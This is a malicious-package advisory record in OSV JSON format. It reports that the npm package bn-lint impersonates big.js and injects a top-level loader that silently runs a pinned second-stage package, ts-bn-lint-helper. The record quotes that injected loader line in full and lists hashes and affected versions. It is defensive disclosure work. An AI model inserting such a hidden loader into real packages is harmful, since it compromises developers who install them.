{"id":"MAL-2026-6376","summary":"Malicious code in bn-lint (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5)\nPackage is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js (README, source, version banner v7.0.1, and repo URL all identify as big.js). Both entrypoints, big.js and big.mjs, have been modified at lines 605-606 to inject `const helper = require(\"ts-bn-lint-helper\"); helper.from_str().then(e =\u003e e).catch(e =\u003e { });` at module top level. Any `require('bn-lint')` or `import` of the package immediately loads and invokes the separately-published, pinned `ts-bn-lint-helper@3.1.19` (declared in package.json line 58). The `.then(e =\u003e e).catch(e =\u003e { })` wrapping silently swallows both resolution and rejection values, suppressing logs, thrown errors, and rejected promises so the secondary payload's execution is invisible to a developer using what they believe to be a big.js arithmetic library. The combination of impersonated identity, top-level loader injection into an otherwise unrelated arithmetic library, a pinned untrusted second-stage dependency, and deliberate error suppression is consistent with a typosquat-with-payload supply-chain attack rather than a legitimate fork.\n","modified":"2026-06-26T21:46:45.395184883Z","published":"2026-06-24T06:26:20Z","database_specific":{"malicious-packages-origins":[{"sha256":"c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5","modified_time":"2026-06-24T06:26:20Z","id":"IN-MAL-2026-007428","source":"amazon-inspector","versions":["3.0.8"],"import_time":"2026-06-24T07:47:32.297622673Z"},{"sha256":"ffccaf731dc19ad034e98203f9fd0e922fcf209bef4b416c9afef09b20e2eb2d","modified_time":"2026-06-26T21:03:07Z","id":"IN-MAL-2026-007664","source":"amazon-inspector","versions":["3.0.6"],"import_time":"2026-06-26T21:34:02.352023988Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/bn-lint/v/3.0.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/bn-lint/v/3.0.6"}],"affected":[{"package":{"name":"bn-lint","ecosystem":"npm","purl":"pkg:npm/bn-lint"},"versions":["3.0.8","3.0.6"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"63c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc","sha256":"00373642f38ae2e845aa36a8f243352a9014829c242360e6958ee49730883290","path":"big.js"}],"package_integrity":[{"filename":"bn-lint-3.0.8.tgz","hashes":{"sha1":"c8239e925acfba12c5db3098bede9443d5d46943","sha512_sri":"sha512-ym1Zdsn1Cxex3/wH3HHuIj0KbALDBvtsCstUX813bc/g8EQubrvZq/Ic0mZeynrwIJ48MevGb6mwg4F+YXtzcA=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bn-lint/MAL-2026-6376.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}